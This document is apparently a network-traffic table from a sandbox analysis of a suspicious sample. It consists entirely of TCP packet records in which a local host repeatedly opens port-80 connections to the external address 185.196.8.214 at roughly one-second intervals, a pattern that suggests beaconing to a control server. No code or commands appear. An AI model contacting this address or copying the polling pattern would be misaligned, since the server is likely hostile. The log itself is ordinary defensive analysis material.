                                                            Sep 11, 2024 21:06:07.139375925 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.139594078 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145122051 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.145170927 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.145343065 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145343065 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.145529032 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.155440092 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.862838984 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.862917900 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.983031034 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.983377934 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992414951 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.992510080 CEST8049706185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.992608070 CEST4970680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992744923 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.992779016 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:07.998164892 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:08.685074091 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:08.685168028 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:08.796487093 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:08.801714897 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.037638903 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.037739992 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.156369925 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.156631947 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161539078 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.161611080 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161645889 CEST8049708185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.161700010 CEST4970880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.161799908 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.166553974 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.851246119 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.851394892 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.971961975 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.972471952 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.977562904 CEST8049710185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.977607965 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:09.977767944 CEST4971080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.977768898 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.978030920 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:09.983011961 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.069535017 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.069617033 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.188045979 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.188544989 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.198738098 CEST8049711185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.198774099 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.198820114 CEST4971180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.198934078 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.199140072 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:11.209758997 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.896188974 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:11.896318913 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.022677898 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.023061991 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.029306889 CEST8049712185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.029392004 CEST4971280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.030095100 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.030174017 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.030303955 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.042583942 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.773536921 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.773663044 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.889739990 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.890106916 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895132065 CEST8049713185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.895210981 CEST4971380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895466089 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:12.895555019 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.895684004 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:12.901684046 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.605597019 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.605917931 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.751866102 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.752177000 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757175922 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.757246017 CEST8049714185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:13.757297039 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757327080 CEST4971480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.757467031 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:13.762242079 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.458170891 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.458614111 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.576709986 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.577063084 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.583539963 CEST8049715185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.583926916 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:14.584012032 CEST4971580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.584041119 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.584191084 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:14.590053082 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.308001995 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.308093071 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.422348976 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.427268982 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.657740116 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.657815933 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.792859077 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.793287039 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.798336029 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.798439026 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.798504114 CEST8049716185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:15.798561096 CEST4971680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.808743954 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:15.813657999 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.511200905 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.511271954 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.623903990 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.628885031 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.890240908 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:16.890326977 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:16.998512030 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.004192114 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.260364056 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.260659933 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.375322104 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.375688076 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381087065 CEST8049717185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.381411076 CEST4971780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381441116 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:17.381618023 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.381763935 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:17.387100935 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.082767963 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.082964897 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.207492113 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.208230019 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.212845087 CEST8049718185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.213074923 CEST4971880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.213324070 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.213505030 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.215065002 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:18.220073938 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.905867100 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:18.905971050 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.030522108 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.030852079 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036042929 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.036088943 CEST8049719185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.036135912 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036175966 CEST4971980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.036345959 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.041302919 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.748555899 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:19.748752117 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.858717918 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:19.864413023 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.096484900 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.096601009 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.220736027 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.221061945 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.225981951 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.226098061 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.226166010 CEST8049720185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.226229906 CEST4972080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.226300955 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:20.231163979 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.935949087 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:20.936228991 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.045954943 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.051141024 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.296415091 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.296598911 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.421264887 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.421597958 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.429747105 CEST8049721185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.429836988 CEST4972180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.430279016 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:21.430361986 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.430515051 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:21.438193083 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.197506905 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.198016882 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.311017990 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.311158895 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316282988 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.316412926 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316538095 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316628933 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.316696882 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.321696043 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.998537064 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.998759985 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.109916925 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.115343094 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.356381893 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.356735945 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.469322920 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.476036072 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.709589958 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.709678888 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.846827030 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.847405910 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.852168083 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.852277994 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.852375984 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.852746964 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.859535933 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.864532948 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.545241117 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.545348883 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:24.655040979 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:24.660018921 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.913373947 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.913525105 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.032943964 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.033282042 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.038394928 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:25.038443089 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:25.038481951 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.038508892 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.038696051 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.043939114 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:25.760459900 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:25.760562897 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.875525951 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:25.881180048 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.218106985 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.218180895 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.328850031 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.334028959 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.568453074 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.568628073 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.688152075 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.688572884 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.697981119 CEST8049725185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.698025942 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:26.698261023 CEST4972580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.698261976 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.698498011 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:26.704950094 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:27.422672987 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:27.422938108 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:27.533900023 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:27.539446115 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:27.778727055 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:27.778831959 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:27.889357090 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:27.894432068 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.137547016 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.137634039 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.250528097 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.255537987 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.493657112 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.493940115 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.608582020 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.609061956 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.615183115 CEST8049726185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.615259886 CEST4972680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.615366936 CEST8049727185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:28.615447044 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.615607023 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:28.621747971 CEST8049727185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:29.319762945 CEST8049727185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:29.319895983 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.436232090 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.436534882 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.441450119 CEST8049728185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:29.441513062 CEST8049727185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:29.441564083 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.441644907 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.441668034 CEST4972780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:29.446465015 CEST8049728185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:30.164091110 CEST8049728185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:30.164158106 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.281743050 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.282151937 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.287026882 CEST8049728185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:30.287074089 CEST8049729185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:30.287101030 CEST4972880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.287153006 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.287338972 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:30.292889118 CEST8049729185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.117788076 CEST8049729185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.118016958 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.235138893 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.235428095 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.240381002 CEST8049730185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.240489960 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.240520000 CEST8049729185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.240585089 CEST4972980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.240688086 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:31.245515108 CEST8049730185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.960966110 CEST8049730185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:31.961080074 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.077366114 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.077711105 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.082712889 CEST8049730185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:32.082756042 CEST8049731185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:32.082771063 CEST4973080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.082834005 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.082981110 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:32.087938070 CEST8049731185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.084676027 CEST8049731185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.084847927 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.201875925 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.202157974 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.207494020 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.207624912 CEST8049731185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.207740068 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.207740068 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.207827091 CEST4973180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:33.213126898 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.902400017 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:33.902632952 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.016259909 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.021431923 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:34.288535118 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:34.288980007 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.405518055 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.405853033 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.410912991 CEST8049732185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:34.410932064 CEST8049733185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:34.410978079 CEST4973280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.411029100 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.411134005 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:34.416026115 CEST8049733185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.098615885 CEST8049733185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.098906040 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.217842102 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.218234062 CEST4973480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.223196983 CEST8049734185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.223355055 CEST8049733185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.223404884 CEST4973480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.223437071 CEST4973380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.223618984 CEST4973480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:35.228619099 CEST8049734185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.918203115 CEST8049734185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:35.918370962 CEST4973480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:36.030136108 CEST4973480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:36.034966946 CEST8049734185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:36.274380922 CEST8049734185.196.8.214192.168.2.5
